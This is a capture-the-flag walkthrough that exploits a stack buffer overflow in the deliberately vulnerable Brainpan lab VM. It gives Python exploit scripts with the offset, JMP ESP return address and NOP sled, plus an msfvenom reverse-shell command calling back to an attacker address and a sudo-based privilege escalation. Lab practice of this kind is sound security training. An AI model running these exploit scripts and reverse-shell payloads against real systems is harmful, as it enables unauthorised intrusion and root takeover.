If your weak area is buffer overflow exploits then vulnhub’s Brainpan is the vm you need to conquer. This is the vulnhub Brainpan walkthrough for Kali Linux.
Want to setup a home pentesting lab to practice your ethical hacking skills? I spell out how it’s done in the 10 easy steps post.
Here’s What You Need:
- Brainpan from vulnhub.
- Kali Linux Virtual Machine (VirtualBox)
- Client Virtual Machine with Immunity Debugger (VirtualBox)
Why Bother with Buffer Overflows?
There comes a time when the only attack surface of a target is a vulnerable application. In that case it is possible to exploit the application itself.
Buffer Overflow
Basically the logic is:
- Send an oversized input to find how many bytes it takes to overflow the buffer.
- Find the exact location of the overwritten instruction pointer.
- Send enough bytes to reach the instruction pointer, then overwrite it with the address of a JMP ESP instruction so that the program continues executing at the location of the shellcode.
- Send exploit and get a shell back.
Information Gathering
To get a listing of the hidden directories on Brainpan's web server I run dirb:
dirb http://10.0.2.11:1000
which reveals the bin directory.
Running the Windows program found there with wine reveals some helpful details. The port looks familiar: this is obviously the application itself that is running on <brainpan>:9999. So I will grab it and throw it in Immunity Debugger to start crafting an exploit.
root@kali:~/brainpan# wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.
Fuzzing the Vulnerable Program
The vulnerable application is hosted on the Brainpan vm.
root@kali:~/brainpan# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Now I plug in the pattern as the buffer and send it on its way.
import socket

# Paste the 1000-byte output of pattern_create.rb here in place of the placeholder.
buffer = b"pattern"
target = "BRAINPAN_IP"  # placeholder for the Brainpan VM's address

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print("sending attack buffer")
    s.connect((target, 9999))
    data = s.recv(1024)          # read the banner / prompt the service sends first
    s.send(buffer + b"\r\n")
    data = s.recv(1024)
    print("\ndone.")
except Exception as err:
    print("ERROR!", err)
finally:
    s.close()
root@kali:~/brainpan# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 35724134
[*] Exact match at offset 524
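How pattern_create.rb and pattern_offset.rb arrive at 524, as an added Python example that is not code from the original walkthrough: it regenerates the same cyclic pattern, locates the four bytes that landed in EIP (the 0x35724134 value above, read little-endian), and shows the little-endian packing that turns a 32-bit address into the byte-reversed string the exploit uses for its JMP ESP return address. The EIP value and the return-address bytes are the ones on this page; the function names are my own.

```python
"""Cyclic-pattern offset finder: a Python reimplementation of what
pattern_create.rb and pattern_offset.rb do (added example, not part of
the original walkthrough)."""
import string
import struct
from typing import Optional


def pattern_create(length: int) -> bytes:
    """Return the Metasploit-style cyclic pattern of the given length.

    The pattern is a sequence of 3-byte triplets Aa0 Aa1 ... Aa9 Ab0 ... Zz9,
    so any 4 consecutive bytes occur at exactly one position (up to 20280 bytes).
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def eip_to_bytes(eip: int) -> bytes:
    """Bytes as they were written into memory on x86.

    EIP is little-endian, so a debugger showing 0x35724134 means the
    overwriting bytes were 34 41 72 35, i.e. b'4Ar5'.
    """
    return struct.pack("<I", eip)


def pattern_offset(eip: int, length: int = 1000) -> Optional[int]:
    """Offset in the pattern at which the 4 bytes that landed in EIP start.

    Equivalent to: pattern_offset.rb -l <length> -q <eip hex>.
    Returns None when the value did not come from the pattern at all.
    """
    needle = eip_to_bytes(eip)
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


def pack_return_address(addr: int) -> bytes:
    """Little-endian packing of a 32-bit address.

    This is why the JMP ESP address in the exploit script appears
    byte-reversed: 0x7E429353 becomes 53 93 42 7E.
    """
    return struct.pack("<I", addr)


if __name__ == "__main__":
    # Value from the walkthrough: EIP after sending the 1000-byte pattern.
    eip = 0x35724134
    print("bytes in EIP:", eip_to_bytes(eip))    # b'4Ar5'
    print("offset:", pattern_offset(eip, 1000))  # 524
    # The return-address bytes used on the page correspond to 0x7E429353.
    print("return address bytes:", pack_return_address(0x7E429353))
```

Position 524 falls on the last byte of the triplet "Ar4", which is followed by "Ar5", so the only place "4Ar5" can occur is offset 524; that uniqueness is the whole reason a cyclic pattern is used instead of a run of "A"s.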
The exact number of “B”s to send in the attack buffer took some guessing. To recap, the “B”s are merely a test sequence in the buffer used to see how adding the JMP ESP return address affects the exploit. If the EIP register is overwritten by the “C”s then I know it is working, and I can then replace them with shellcode. This took some testing; it was somewhere between 4 and 10 bytes.
import socket

target = "BRAINPAN_IP"  # placeholder for the Brainpan VM's address

# 524 is the offset found with pattern_offset.rb, remember
pattern = b"A" * 524
# found this using a search for jmp esp in Immunity Debugger (little-endian byte order)
return_address = b"\x53\x93\x42\x7E"
# test sequences used while working out the layout:
# b = b"B" * 10
# c = b"C" * 472   # 1000 - 524 - 4
nops = b"\x90" * 10
# paste the msfvenom output here; empty placeholder until it is generated
shellcode = b""
buffer = pattern + return_address + nops + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print("sending attack buffer")
    s.connect((target, 9999))
    data = s.recv(1024)          # read the banner / prompt the service sends first
    s.send(buffer + b"\r\n")
    data = s.recv(1024)
    print("\ndone.")
except Exception as err:
    print("ERROR!", err)
finally:
    s.close()
Now I need to generate shellcode for a reverse shell on a Linux target. The -b "\x00" option tells msfvenom not to include any null bytes, as these may disrupt the exploit.
root@kali:~/brainpan# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.2.5 LPORT=4444 EXITFUNC=thread -e x86/alpha_upper -b "\x00" -f c
Running the exploit with the Linux shellcode now returns a shell from the Brainpan machine.
Linux Privilege Escalation
From here I want a better shell, so I run a Python one-liner to spawn a TTY (teletypewriter) shell.
python -c "import pty; pty.spawn('/bin/sh')"
Next I use a common technique: check which commands my current user can already run with root-level privileges through sudo, then run them myself to escalate.
sudo -l
Running the command lists the commands my current user can run with root privileges, and from there I have root!